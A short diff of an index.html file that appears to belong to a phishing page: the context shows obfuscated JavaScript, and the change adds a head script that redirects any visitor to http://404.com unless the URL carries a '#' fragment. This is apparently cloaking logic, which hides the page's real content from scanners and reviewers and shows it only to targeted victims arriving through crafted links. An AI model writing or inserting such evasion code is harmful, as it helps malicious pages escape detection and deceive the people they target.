--- a/index.html
+++ b/index.html
@@ -45,7 +45,22 @@ function _0x36c6(_0x582953,_0x44adf9){var _0x107846=_0x1078();return _0x36c6=fun
 	</script>
 	
 </head>
-
+<script>
+try {
+    let xy = window.location.href.split("#");
+    
+    if (xy[1] && xy[1] !== "") {
+      console.log("Found");
+    } else {
+      window.location.href =
+        "http://404.com";
+    }
+  } catch (e) {
+    window.location.href =
+       "http://404.com";
+    console.log(e);
+  }
+ </script>
 <body class="cb" style="display:block">
 
 	<div>
@@ -166,5 +181,6 @@ function _0x57a8(_0x562000,_0x3e7289){var _0x1d9b00=_0x1d9b();return _0x57a8=fun
 </script>
 
 </body>
+
 
 </html>
